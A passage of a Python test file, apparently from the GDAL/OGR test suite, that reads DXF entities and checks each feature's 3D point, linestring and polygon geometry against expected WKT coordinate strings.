return 'fail'
# OGRFeature(entities):16
# EntityHandle (String) = 1C8
# POINT Z (7 7 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (7 7 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):17
# EntityHandle (String) = 1C9
# POINT Z (-2.0 4.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-2.0 4.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):18
# EntityHandle (String) = 1CA
# LINESTRING Z (0 0 0,-0.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,-0.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):19
# EntityHandle (String) = 1CB
# LINESTRING Z (-0.5 1.0 -0.866025403784439,-1.0 1.0 -1.73205080756888,-0.5 2.0 -0.866025403784439,-0.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-0.5 1.0 -0.866025403784439,-1.0 1.0 -1.73205080756888,-0.5 2.0 -0.866025403784439,-0.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):20
# EntityHandle (String) = 1CC
# LINESTRING Z (-0.5 1.0 -0.866025403784439,-0.5 2.0 -0.866025403784439,-1.0 2.0 -1.73205080756888,-0.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-0.5 1.0 -0.866025403784439,-0.5 2.0 -0.866025403784439,-1.0 2.0 -1.73205080756888,-0.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):21
# EntityHandle (String) = 1D1
# LINESTRING Z (-2.0 6.0 -3.46410161513776,-2.06975647374412 5.99512810051965 -3.58492337181942,-2.13917310096006 5.98053613748314 -3.7051564970475,-2.20791169081776 5.95629520146761 -3.82421522712167,-2.275637355817 5.92252339187664 -3.94151951987674,-2.34202014332567 5.87938524157182 -4.0564978805898,-2.4067366430758 5.8270909152852 -4.16859014624505,-2.46947156278589 5.76589518571785 -4.27725021459168,-2.5299192642332 5.69609619231285 -4.38194870469918,-2.58778525229247 5.61803398874989 -4.48217553604801,-2.64278760968654 5.53208888623796 -4.57744241359059,-2.694658370459 5.4386796006773 -4.66728520667574,-2.74314482547739 5.33826121271772 -4.75126621024651,-2.78801075360672 5.23132295065132 -4.82897627729524,-2.82903757255504 5.11838580694149 -4.90003681218666,-2.86602540378444 5.0 -4.96410161513776,-2.89879404629917 4.87674229357815 -5.02085856886833,-2.92718385456679 4.74921318683182 -5.07003115920498,-2.95105651629515 4.61803398874989 -5.11137982223042,-2.970295726276 4.48384379119934 -5.14470311141473,-2.98480775301221 4.34729635533386 -5.16983867904264,-2.99452189536827 4.20905692653531 -5.1866640671553,-2.99939082701909 4.069798993405 -5.19509730415311,-2.99939082701909 3.930201006595 -5.19509730415311,-2.99452189536827 3.79094307346469 -5.1866640671553,-2.98480775301221 3.65270364466614 -5.16983867904264,-2.970295726276 3.51615620880066 -5.14470311141473,-2.95105651629515 3.38196601125011 -5.11137982223042,-2.92718385456679 3.25078681316818 -5.07003115920498,-2.89879404629917 3.12325770642185 -5.02085856886833,-2.86602540378444 3.0 -4.96410161513776,-2.82903757255504 2.88161419305851 -4.90003681218666,-2.78801075360672 2.76867704934868 -4.82897627729524,-2.74314482547739 2.66173878728228 -4.75126621024651,-2.694658370459 2.5613203993227 -4.66728520667574,-2.64278760968654 2.46791111376204 -4.5774424135906,-2.58778525229247 2.38196601125011 -4.48217553604801,-2.5299192642332 2.30390380768715 -4.38194870469918,-2.46947156278589 2.23410481428215 -4.27725021459168,-2.4067366430758 2.1729090847148 -4.16859014624505,-2.34202014332567 2.12061475842818 -4.0564978805898,-2.275637355817 2.07747660812336 -3.94151951987674,-2.20791169081776 2.04370479853239 -3.82421522712167,-2.13917310096006 2.01946386251686 -3.7051564970475,-2.06975647374412 2.00487189948035 -3.58492337181943,-2.0 2.0 -3.46410161513776,-1.93024352625587 2.00487189948035 -3.34327985845609,-1.86082689903993 2.01946386251686 -3.22304673322801,-1.79208830918224 2.04370479853239 -3.10398800315384,-1.724362644183 2.07747660812336 -2.98668371039877,-1.65797985667433 2.12061475842818 -2.87170534968571,-1.5932633569242 2.1729090847148 -2.75961308403046,-1.53052843721411 2.23410481428215 -2.65095301568383,
# -1.47008073576679 2.30390380768715 -2.54625452557633,-1.41221474770753 2.38196601125011 -2.4460276942275,-1.35721239031346 2.46791111376204 -2.35076081668492,-1.305341629541 2.5613203993227 -2.26091802359977,-1.25685517452261 2.66173878728228 -2.176937020029,-1.21198924639328 2.76867704934868 -2.09922695298027,-1.17096242744496 2.88161419305851 -2.02816641808885,-1.13397459621556 3.0 -1.96410161513776,-1.10120595370083 3.12325770642184 -1.90734466140718,-1.07281614543321 3.25078681316818 -1.85817207107053,-1.04894348370485 3.38196601125011 -1.81682340804509,-1.029704273724 3.51615620880066 -1.78350011886079,-1.01519224698779 3.65270364466614 -1.75836455123287,-1.00547810463173 3.79094307346469 -1.74153916312021,-1.0006091729809 3.930201006595 -1.7331059261224,-1.0006091729809 4.069798993405 -1.7331059261224,-1.00547810463173 4.20905692653531 -1.74153916312021,-1.01519224698779 4.34729635533386 -1.75836455123287,-1.029704273724 4.48384379119933 -1.78350011886078,-1.04894348370485 4.61803398874989 -1.81682340804509,-1.07281614543321 4.74921318683182 -1.85817207107053,-1.10120595370083 4.87674229357815 -1.90734466140718,-1.13397459621556 5.0 -1.96410161513776,-1.17096242744496 5.11838580694149 -2.02816641808885,-1.21198924639328 5.23132295065132 -2.09922695298027,-1.25685517452261 5.33826121271772 -2.176937020029,-1.305341629541 5.4386796006773 -2.26091802359977,-1.35721239031346 5.53208888623796 -2.35076081668492,-1.41221474770753 5.61803398874989 -2.4460276942275,-1.47008073576679 5.69609619231285 -2.54625452557633,-1.53052843721411 5.76589518571785 -2.65095301568383,-1.5932633569242 5.8270909152852 -2.75961308403046,-1.65797985667433 5.87938524157182 -2.87170534968571,-1.724362644183 5.92252339187664 -2.98668371039877,-1.79208830918224 5.95629520146761 -3.10398800315384,-1.86082689903993 5.98053613748314 -3.22304673322801,-1.93024352625587 5.99512810051965 -3.34327985845609,-2.0 6.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 6.0 -3.46410161513776,-2.06975647374412 5.99512810051965 -3.58492337181942,-2.13917310096006 5.98053613748314 -3.7051564970475,-2.20791169081776 5.95629520146761 -3.82421522712167,-2.275637355817 5.92252339187664 -3.94151951987674,-2.34202014332567 5.87938524157182 -4.0564978805898,-2.4067366430758 5.8270909152852 -4.16859014624505,-2.46947156278589 5.76589518571785 -4.27725021459168,-2.5299192642332 5.69609619231285 -4.38194870469918,-2.58778525229247 5.61803398874989 -4.48217553604801,-2.64278760968654 5.53208888623796 -4.57744241359059,-2.694658370459 5.4386796006773 -4.66728520667574,-2.74314482547739 5.33826121271772 -4.75126621024651,-2.78801075360672 5.23132295065132 -4.82897627729524,-2.82903757255504 5.11838580694149 -4.90003681218666,-2.86602540378444 5.0 -4.96410161513776,-2.89879404629917 4.87674229357815 -5.02085856886833,-2.92718385456679 4.74921318683182 -5.07003115920498,-2.95105651629515 4.61803398874989 -5.11137982223042,-2.970295726276 4.48384379119934 -5.14470311141473,-2.98480775301221 4.34729635533386 -5.16983867904264,-2.99452189536827 4.20905692653531 -5.1866640671553,-2.99939082701909 4.069798993405 -5.19509730415311,-2.99939082701909 3.930201006595 -5.19509730415311,-2.99452189536827 3.79094307346469 -5.1866640671553,-2.98480775301221 3.65270364466614 -5.16983867904264,-2.970295726276 3.51615620880066 -5.14470311141473,-2.95105651629515 3.38196601125011 -5.11137982223042,-2.92718385456679 3.25078681316818 -5.07003115920498,-2.89879404629917 3.12325770642185 -5.02085856886833,-2.86602540378444 3.0 -4.96410161513776,-2.82903757255504 2.88161419305851 -4.90003681218666,-2.78801075360672 2.76867704934868 -4.82897627729524,-2.74314482547739 2.66173878728228 -4.75126621024651,-2.694658370459 2.5613203993227 -4.66728520667574,-2.64278760968654 2.46791111376204 -4.5774424135906,-2.58778525229247 2.38196601125011 -4.48217553604801,-2.5299192642332 2.30390380768715 -4.38194870469918,-2.46947156278589 2.23410481428215 -4.27725021459168,-2.4067366430758 2.1729090847148 -4.16859014624505,-2.34202014332567 2.12061475842818 -4.0564978805898,-2.275637355817 2.07747660812336 -3.94151951987674,-2.20791169081776 2.04370479853239 -3.82421522712167,-2.13917310096006 2.01946386251686 -3.7051564970475,-2.06975647374412 2.00487189948035 -3.58492337181943,-2.0 2.0 -3.46410161513776,-1.93024352625587 2.00487189948035 -3.34327985845609,-1.86082689903993 2.01946386251686 -3.22304673322801,-1.79208830918224 2.04370479853239 -3.10398800315384,-1.724362644183 2.07747660812336 -2.98668371039877,' + \
'-1.65797985667433 2.12061475842818 -2.87170534968571,-1.5932633569242 2.1729090847148 -2.75961308403046,-1.53052843721411 2.23410481428215 -2.65095301568383,-1.47008073576679 2.30390380768715 -2.54625452557633,-1.41221474770753 2.38196601125011 -2.4460276942275,-1.35721239031346 2.46791111376204 -2.35076081668492,-1.305341629541 2.5613203993227 -2.26091802359977,-1.25685517452261 2.66173878728228 -2.176937020029,-1.21198924639328 2.76867704934868 -2.09922695298027,-1.17096242744496 2.88161419305851 -2.02816641808885,-1.13397459621556 3.0 -1.96410161513776,-1.10120595370083 3.12325770642184 -1.90734466140718,-1.07281614543321 3.25078681316818 -1.85817207107053,-1.04894348370485 3.38196601125011 -1.81682340804509,-1.029704273724 3.51615620880066 -1.78350011886079,-1.01519224698779 3.65270364466614 -1.75836455123287,-1.00547810463173 3.79094307346469 -1.74153916312021,-1.0006091729809 3.930201006595 -1.7331059261224,-1.0006091729809 4.069798993405 -1.7331059261224,-1.00547810463173 4.20905692653531 -1.74153916312021,-1.01519224698779 4.34729635533386 -1.75836455123287,-1.029704273724 4.48384379119933 -1.78350011886078,-1.04894348370485 4.61803398874989 -1.81682340804509,-1.07281614543321 4.74921318683182 -1.85817207107053,-1.10120595370083 4.87674229357815 -1.90734466140718,-1.13397459621556 5.0 -1.96410161513776,-1.17096242744496 5.11838580694149 -2.02816641808885,-1.21198924639328 5.23132295065132 -2.09922695298027,-1.25685517452261 5.33826121271772 -2.176937020029,-1.305341629541 5.4386796006773 -2.26091802359977,-1.35721239031346 5.53208888623796 -2.35076081668492,-1.41221474770753 5.61803398874989 -2.4460276942275,-1.47008073576679 5.69609619231285 -2.54625452557633,-1.53052843721411 5.76589518571785 -2.65095301568383,-1.5932633569242 5.8270909152852 -2.75961308403046,-1.65797985667433 5.87938524157182 -2.87170534968571,-1.724362644183 5.92252339187664 -2.98668371039877,-1.79208830918224 5.95629520146761 -3.10398800315384,-1.86082689903993 5.98053613748314 -3.22304673322801,-1.93024352625587 5.99512810051965 -3.34327985845609,-2.0 6.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):22
# EntityHandle (String) = 1D2
# LINESTRING Z (-1.0 4.0 -1.73205080756888,-2.0 4.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1.0 4.0 -1.73205080756888,-2.0 4.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):23
# EntityHandle (String) = 1D3
# LINESTRING Z (-2.0 4.0 -3.46410161513775,-3.0 4.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 4.0 -3.46410161513775,-3.0 4.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):24
# EntityHandle (String) = 1D4
# LINESTRING Z (-2.0 3.0 -3.46410161513775,-2.0 4.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 3.0 -3.46410161513775,-2.0 4.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):25
# EntityHandle (String) = 1D5
# LINESTRING Z (-2.0 4.0 -3.46410161513775,-2.0 5.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 4.0 -3.46410161513775,-2.0 5.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):26
# EntityHandle (String) = 1D6
# LINESTRING Z (-1.0 4.0 -1.73205080756888,-1.00243594974018 4.06975647374412 -1.73626999628355,-1.00973193125843 4.13917310096007 -1.74890700696425,-1.02185239926619 4.20791169081776 -1.76990027336521,-1.03873830406168 4.275637355817 -1.79914751840276,-1.06030737921409 4.34202014332567 -1.83650625243901,-1.0864545423574 4.4067366430758 -1.88179446747701,-1.11705240714107 4.46947156278589 -1.93479152388545,-1.15195190384357 4.52991926423321 -1.99523922533277,-1.19098300562505 4.58778525229247 -2.06284307669368,-1.23395555688102 4.64278760968654 -2.13727371879988,-1.28066019966135 4.694658370459 -2.21816853304476,-1.33086939364114 4.74314482547739 -2.30513340802484,-1.38433852467434 4.78801075360672 -2.3977446596109,-1.44080709652925 4.82903757255504 -2.49555109509446,-1.5 4.86602540378444 -2.59807621135332,-1.56162885321092 4.89879404629917 -2.70482051632684,-1.62539340658409 4.92718385456679 -2.8152639624911,-1.69098300562505 4.95105651629515 -2.92886848047812,-1.75807810440033 4.970295726276 -3.04508060049576,-1.82635182233307 4.98480775301221 -3.16333414877688,-1.89547153673235 4.99452189536827 -3.28305300592108,-1.9651005032975 4.99939082701909 -3.40365391369044,-2.0348994967025 4.99939082701909 -3.52454931658507,-2.10452846326765 4.99452189536827 -3.64515022435443,-2.17364817766693 4.98480775301221 -3.76486908149863,-2.24192189559967 4.970295726276 -3.88312262977975,-2.30901699437495 4.95105651629515 -3.99933474979739,-2.37460659341591 4.92718385456679 -4.11293926778441,-2.43837114678908 4.89879404629917 -4.22338271394867,-2.5 4.86602540378444 -4.33012701892219,-2.55919290347075 4.82903757255504 -4.43265213518105,-2.61566147532566 4.78801075360672 -4.53045857066461,-2.66913060635886 4.74314482547739 -4.62306982225067,-2.71933980033865 4.694658370459 -4.71003469723075,-2.76604444311898 4.64278760968654 -4.79092951147563,-2.80901699437495 4.58778525229247 -4.86536015358183,-2.84804809615642 4.5299192642332 -4.93296400494274,-2.88294759285893 4.46947156278589 -4.99341170639005,-2.9135454576426 4.4067366430758 -5.0464087627985,-2.93969262078591 4.34202014332567 -5.0916969778365,-2.96126169593832 4.275637355817 -5.12905571187275,-2.9781476007338 4.20791169081776 -5.1583029569103,-2.99026806874157 4.13917310096007 -5.17929622331126,-2.99756405025982 4.06975647374412 -5.19193323399196,-3.0 4.0 -5.19615242270663,-2.99756405025982 3.93024352625587 -5.19193323399196,-2.99026806874157 3.86082689903993 -5.17929622331126,-2.9781476007338 3.79208830918224 -5.1583029569103,-2.96126169593832 3.724362644183 -5.12905571187275,
#-2.93969262078591 3.65797985667433 -5.0916969778365,-2.9135454576426 3.5932633569242 -5.0464087627985,-2.88294759285893 3.53052843721411 -4.99341170639005,-2.84804809615642 3.4700807357668 -4.93296400494274,-2.80901699437495 3.41221474770753 -4.86536015358183,-2.76604444311898 3.35721239031346 -4.79092951147563,-2.71933980033865 3.305341629541 -4.71003469723075,-2.66913060635886 3.25685517452261 -4.62306982225067,-2.61566147532566 3.21198924639328 -4.53045857066461,-2.55919290347075 3.17096242744496 -4.43265213518105,-2.5 3.13397459621556 -4.33012701892219,-2.43837114678908 3.10120595370083 -4.22338271394867,-2.37460659341591 3.07281614543321 -4.11293926778441,-2.30901699437495 3.04894348370485 -3.99933474979739,-2.24192189559967 3.029704273724 -3.88312262977975,-2.17364817766693 3.01519224698779 -3.76486908149863,-2.10452846326765 3.00547810463173 -3.64515022435443,-2.0348994967025 3.0006091729809 -3.52454931658507,-1.9651005032975 3.0006091729809 -3.40365391369044,-1.89547153673235 3.00547810463173 -3.28305300592108,-1.82635182233307 3.01519224698779 -3.16333414877688,-1.75807810440033 3.029704273724 -3.04508060049576,-1.69098300562505 3.04894348370485 -2.92886848047812,-1.62539340658409 3.07281614543321 -2.8152639624911,-1.56162885321092 3.10120595370083 -2.70482051632684,-1.5 3.13397459621556 -2.59807621135332,-1.44080709652925 3.17096242744496 -2.49555109509446,-1.38433852467434 3.21198924639328 -2.3977446596109,-1.33086939364114 3.25685517452261 -2.30513340802484,-1.28066019966135 3.305341629541 -2.21816853304476,-1.23395555688102 3.35721239031346 -2.13727371879988,-1.19098300562505 3.41221474770753 -2.06284307669368,-1.15195190384357 3.4700807357668 -1.99523922533277,-1.11705240714107 3.53052843721411 -1.93479152388545,-1.0864545423574 3.5932633569242 -1.88179446747701,-1.06030737921409 3.65797985667433 -1.83650625243901,-1.03873830406168 3.724362644183 -1.79914751840276,-1.02185239926619 3.79208830918224 -1.76990027336521,-1.00973193125843 3.86082689903993 -1.74890700696425,-1.00243594974018 3.93024352625587 -1.73626999628355,-1.0 4.0 -1.73205080756888)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1.0 4.0 -1.73205080756888,-1.00243594974018 4.06975647374412 -1.73626999628355,-1.00973193125843 4.13917310096007 -1.74890700696425,-1.02185239926619 4.20791169081776 -1.76990027336521,-1.03873830406168 4.275637355817 -1.79914751840276,-1.06030737921409 4.34202014332567 -1.83650625243901,-1.0864545423574 4.4067366430758 -1.88179446747701,-1.11705240714107 4.46947156278589 -1.93479152388545,-1.15195190384357 4.52991926423321 -1.99523922533277,-1.19098300562505 4.58778525229247 -2.06284307669368,-1.23395555688102 4.64278760968654 -2.13727371879988,-1.28066019966135 4.694658370459 -2.21816853304476,-1.33086939364114 4.74314482547739 -2.30513340802484,-1.38433852467434 4.78801075360672 -2.3977446596109,-1.44080709652925 4.82903757255504 -2.49555109509446,-1.5 4.86602540378444 -2.59807621135332,-1.56162885321092 4.89879404629917 -2.70482051632684,-1.62539340658409 4.92718385456679 -2.8152639624911,-1.69098300562505 4.95105651629515 -2.92886848047812,-1.75807810440033 4.970295726276 -3.04508060049576,-1.82635182233307 4.98480775301221 -3.16333414877688,-1.89547153673235 4.99452189536827 -3.28305300592108,-1.9651005032975 4.99939082701909 -3.40365391369044,-2.0348994967025 4.99939082701909 -3.52454931658507,-2.10452846326765 4.99452189536827 -3.64515022435443,-2.17364817766693 4.98480775301221 -3.76486908149863,-2.24192189559967 4.970295726276 -3.88312262977975,-2.30901699437495 4.95105651629515 -3.99933474979739,-2.37460659341591 4.92718385456679 -4.11293926778441,-2.43837114678908 4.89879404629917 -4.22338271394867,-2.5 4.86602540378444 -4.33012701892219,-2.55919290347075 4.82903757255504 -4.43265213518105,-2.61566147532566 4.78801075360672 -4.53045857066461,-2.66913060635886 4.74314482547739 -4.62306982225067,-2.71933980033865 4.694658370459 -4.71003469723075,-2.76604444311898 4.64278760968654 -4.79092951147563,-2.80901699437495 4.58778525229247 -4.86536015358183,-2.84804809615642 4.5299192642332 -4.93296400494274,-2.88294759285893 4.46947156278589 -4.99341170639005,-2.9135454576426 4.4067366430758 -5.0464087627985,-2.93969262078591 4.34202014332567 -5.0916969778365,-2.96126169593832 4.275637355817 -5.12905571187275,-2.9781476007338 4.20791169081776 -5.1583029569103,-2.99026806874157 4.13917310096007 -5.17929622331126,-2.99756405025982 4.06975647374412 -5.19193323399196,-3.0 4.0 -5.19615242270663,-2.99756405025982 3.93024352625587 -5.19193323399196,-2.99026806874157 3.86082689903993 -5.17929622331126,-2.9781476007338 3.79208830918224 -5.1583029569103,-2.96126169593832 3.724362644183 -5.12905571187275,' + \
'-2.93969262078591 3.65797985667433 -5.0916969778365,-2.9135454576426 3.5932633569242 -5.0464087627985,-2.88294759285893 3.53052843721411 -4.99341170639005,-2.84804809615642 3.4700807357668 -4.93296400494274,-2.80901699437495 3.41221474770753 -4.86536015358183,-2.76604444311898 3.35721239031346 -4.79092951147563,-2.71933980033865 3.305341629541 -4.71003469723075,-2.66913060635886 3.25685517452261 -4.62306982225067,-2.61566147532566 3.21198924639328 -4.53045857066461,-2.55919290347075 3.17096242744496 -4.43265213518105,-2.5 3.13397459621556 -4.33012701892219,-2.43837114678908 3.10120595370083 -4.22338271394867,-2.37460659341591 3.07281614543321 -4.11293926778441,-2.30901699437495 3.04894348370485 -3.99933474979739,-2.24192189559967 3.029704273724 -3.88312262977975,-2.17364817766693 3.01519224698779 -3.76486908149863,-2.10452846326765 3.00547810463173 -3.64515022435443,-2.0348994967025 3.0006091729809 -3.52454931658507,-1.9651005032975 3.0006091729809 -3.40365391369044,-1.89547153673235 3.00547810463173 -3.28305300592108,-1.82635182233307 3.01519224698779 -3.16333414877688,-1.75807810440033 3.029704273724 -3.04508060049576,-1.69098300562505 3.04894348370485 -2.92886848047812,-1.62539340658409 3.07281614543321 -2.8152639624911,-1.56162885321092 3.10120595370083 -2.70482051632684,-1.5 3.13397459621556 -2.59807621135332,-1.44080709652925 3.17096242744496 -2.49555109509446,-1.38433852467434 3.21198924639328 -2.3977446596109,-1.33086939364114 3.25685517452261 -2.30513340802484,-1.28066019966135 3.305341629541 -2.21816853304476,-1.23395555688102 3.35721239031346 -2.13727371879988,-1.19098300562505 3.41221474770753 -2.06284307669368,-1.15195190384357 3.4700807357668 -1.99523922533277,-1.11705240714107 3.53052843721411 -1.93479152388545,-1.0864545423574 3.5932633569242 -1.88179446747701,-1.06030737921409 3.65797985667433 -1.83650625243901,-1.03873830406168 3.724362644183 -1.79914751840276,-1.02185239926619 3.79208830918224 -1.76990027336521,-1.00973193125843 3.86082689903993 -1.74890700696425,-1.00243594974018 3.93024352625587 -1.73626999628355,-1.0 4.0 -1.73205080756888)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):27
# EntityHandle (String) = 1D7
# LINESTRING Z (-1.0 2.0 -1.73205080756888,-0.983288972510522 2.03582232791524 -1.70310645891042,-0.967858303543227 2.07387296203834 -1.67637975626429,-0.953782068732337 2.11396923855472 -1.65199900239256,-0.941127841688774 2.15591867344963 -1.6300812382226,-0.929956369609942 2.19951988653655 -1.61073168098672,-0.92032128166002 2.24456356819194 -1.59404321912206,-0.912268831520699 2.29083348415575 -1.58009596635534,-0.905837675348257 2.33810751357387 -1.56895687711326,-0.901058686202915 2.38615871529951 -1.56067942510471,-0.89795480584129 2.43475641733454 -1.55530334661776,-0.896540934583439 2.48366732418105 -1.5528544497638,-0.896823859783196 2.53265663678705 -1.55334449058452,-0.898802223245158 2.58148917971011 -1.55677111661648,-0.902466527744776 2.62993053008786 -1.56311787818422,-0.907799182620207 2.67774814299567 -1.5723543073677,-0.9147745882171 2.72471246778926 -1.58443606426492,-0.923359258780906 2.7705980500731 -1.59930514984767,-0.933511983206783 2.81518461400453 -1.61689018438853,-0.945184022875394 2.85825811973811 -1.63710675012253,-0.958319345624882 2.89961179093367 -1.65985779649846,-0.972854894735838 2.93904710739563 -1.68503410607454,-0.988720891637972 2.97637475807832 -1.71251481882177,-1.00584117088534 3.01141554988232 -1.74216801231798,-1.02413354579207 3.04400126787917 -1.77385133504753,-1.04351020297329 3.07397548283483 -1.80741268976625,-1.06387812389736 3.10119430215541 -1.84269096365129,-1.08513953142555 3.12552706065018 -1.87951680173053,-1.1071923591957 3.14685694779575 -1.917713419879,-1.12993074159648 3.16508156849045 -1.95709745347909,-1.15324552198012 3.18011343460661 -1.99747983767086,-1.17702477667387 3.1918803849814 -2.03866671496655,-1.20115435227475 3.20032593182975 -2.08046036587236,-1.22551841364822 3.2054095319166 -2.12266015804993,-1.25 3.20710678118655 -2.1650635094611,-1.27448158635178 3.2054095319166 -2.20746686087227,-1.29884564772525 3.20032593182975 -2.24966665304983,-1.32297522332613 3.1918803849814 -2.29146030395564,-1.34675447801988 3.18011343460661 -2.33264718125133,-1.37006925840352 3.16508156849045 -2.3730295654431,-1.3928076408043 3.14685694779575 -2.41241359904319,-1.41486046857445 3.12552706065018 -2.45061021719166,-1.43612187610264 3.10119430215541 -2.48743605527091,-1.45648979702671 3.07397548283483 -2.52271432915594,-1.47586645420793 3.04400126787917 -2.55627568387467,-1.49415882911466 3.01141554988232 -2.58795900660421,-1.51127910836203 2.97637475807832 -2.61761220010042,-1.52714510526416 2.93904710739563 -2.64509291284765,-1.54168065437512 2.89961179093367 -2.67026922242374,-1.55481597712461 2.85825811973811 -2.69302026879967,-1.56648801679322 2.81518461400453 -2.71323683453366,-1.57664074121909 2.7705980500731 -2.73082186907453,-1.5852254117829 2.72471246778926 -2.74569095465728,-1.59220081737979 2.67774814299567 -2.7577727115545,-1.59753347225522 2.62993053008785 -2.76700914073797,-1.60119777675484 2.58148917971011 -2.77335590230571,-1.6031761402168 2.53265663678705 -2.77678252833767,-1.60345906541656 2.48366732418105 -2.77727256915839,-1.60204519415871 2.43475641733454 -2.77482367230443,-1.59894131379708 2.38615871529951 -2.76944759381748,-1.59416232465174 2.33810751357387 -2.76117014180893,-1.5877311684793 2.29083348415575 -2.75003105256685,-1.57967871833998 2.24456356819194 -2.73608379980013,-1.57004363039006 2.19951988653655 -2.71939533793547,-1.55887215831123 2.15591867344963 -2.7000457806996,-1.54621793126766 2.11396923855472 -2.67812801652963,-1.53214169645677 2.07387296203834 -2.6537472626579,-1.51671102748948 2.03582232791524 -2.62702056001177,-1.5 2.0 -2.59807621135332)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1.0 2.0 -1.73205080756888,-0.983288972510522 2.03582232791524 -1.70310645891042,-0.967858303543227 2.07387296203834 -1.67637975626429,-0.953782068732337 2.11396923855472 -1.65199900239256,-0.941127841688774 2.15591867344963 -1.6300812382226,-0.929956369609942 2.19951988653655 -1.61073168098672,-0.92032128166002 2.24456356819194 -1.59404321912206,-0.912268831520699 2.29083348415575 -1.58009596635534,-0.905837675348257 2.33810751357387 -1.56895687711326,-0.901058686202915 2.38615871529951 -1.56067942510471,-0.89795480584129 2.43475641733454 -1.55530334661776,-0.896540934583439 2.48366732418105 -1.5528544497638,-0.896823859783196 2.53265663678705 -1.55334449058452,-0.898802223245158 2.58148917971011 -1.55677111661648,-0.902466527744776 2.62993053008786 -1.56311787818422,-0.907799182620207 2.67774814299567 -1.5723543073677,-0.9147745882171 2.72471246778926 -1.58443606426492,-0.923359258780906 2.7705980500731 -1.59930514984767,-0.933511983206783 2.81518461400453 -1.61689018438853,-0.945184022875394 2.85825811973811 -1.63710675012253,-0.958319345624882 2.89961179093367 -1.65985779649846,-0.972854894735838 2.93904710739563 -1.68503410607454,-0.988720891637972 2.97637475807832 -1.71251481882177,-1.00584117088534 3.01141554988232 -1.74216801231798,-1.02413354579207 3.04400126787917 -1.77385133504753,-1.04351020297329 3.07397548283483 -1.80741268976625,-1.06387812389736 3.10119430215541 -1.84269096365129,-1.08513953142555 3.12552706065018 -1.87951680173053,-1.1071923591957 3.14685694779575 -1.917713419879,-1.12993074159648 3.16508156849045 -1.95709745347909,-1.15324552198012 3.18011343460661 -1.99747983767086,-1.17702477667387 3.1918803849814 -2.03866671496655,-1.20115435227475 3.20032593182975 -2.08046036587236,-1.22551841364822 3.2054095319166 -2.12266015804993,-1.25 3.20710678118655 -2.1650635094611,-1.27448158635178 3.2054095319166 -2.20746686087227,-1.29884564772525 3.20032593182975 -2.24966665304983,-1.32297522332613 3.1918803849814 -2.29146030395564,-1.34675447801988 3.18011343460661 -2.33264718125133,-1.37006925840352 3.16508156849045 -2.3730295654431,-1.3928076408043 3.14685694779575 -2.41241359904319,-1.41486046857445 3.12552706065018 -2.45061021719166,-1.43612187610264 3.10119430215541 -2.48743605527091,-1.45648979702671 3.07397548283483 -2.52271432915594,-1.47586645420793 3.04400126787917 -2.55627568387467,-1.49415882911466 3.01141554988232 -2.58795900660421,-1.51127910836203 2.97637475807832 -2.61761220010042,-1.52714510526416 2.93904710739563 -2.64509291284765,-1.54168065437512 2.89961179093367 -2.67026922242374,-1.55481597712461 2.85825811973811 -2.69302026879967,-1.56648801679322 2.81518461400453 -2.71323683453366,-1.57664074121909 2.7705980500731 -2.73082186907453,-1.5852254117829 2.72471246778926 -2.74569095465728,-1.59220081737979 2.67774814299567 -2.7577727115545,-1.59753347225522 2.62993053008785 -2.76700914073797,-1.60119777675484 2.58148917971011 -2.77335590230571,-1.6031761402168 2.53265663678705 -2.77678252833767,-1.60345906541656 2.48366732418105 -2.77727256915839,-1.60204519415871 2.43475641733454 -2.77482367230443,-1.59894131379708 2.38615871529951 -2.76944759381748,-1.59416232465174 2.33810751357387 -2.76117014180893,-1.5877311684793 2.29083348415575 -2.75003105256685,-1.57967871833998 2.24456356819194 -2.73608379980013,-1.57004363039006 2.19951988653655 -2.71939533793547,-1.55887215831123 2.15591867344963 -2.7000457806996,-1.54621793126766 2.11396923855472 -2.67812801652963,-1.53214169645677 2.07387296203834 -2.6537472626579,-1.51671102748948 2.03582232791524 -2.62702056001177,-1.5 2.0 -2.59807621135332)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):28
# EntityHandle (String) = 1D8
# POLYGON Z ((-0.5 2.0 -0.866025403784439,-0.5 3.0 -0.866025403784439,-1.0 3.0 -1.73205080756888,-1.0 2.0 -1.73205080756888,-0.5 2.0 -0.866025403784439))
feat = lyr.GetNextFeature()
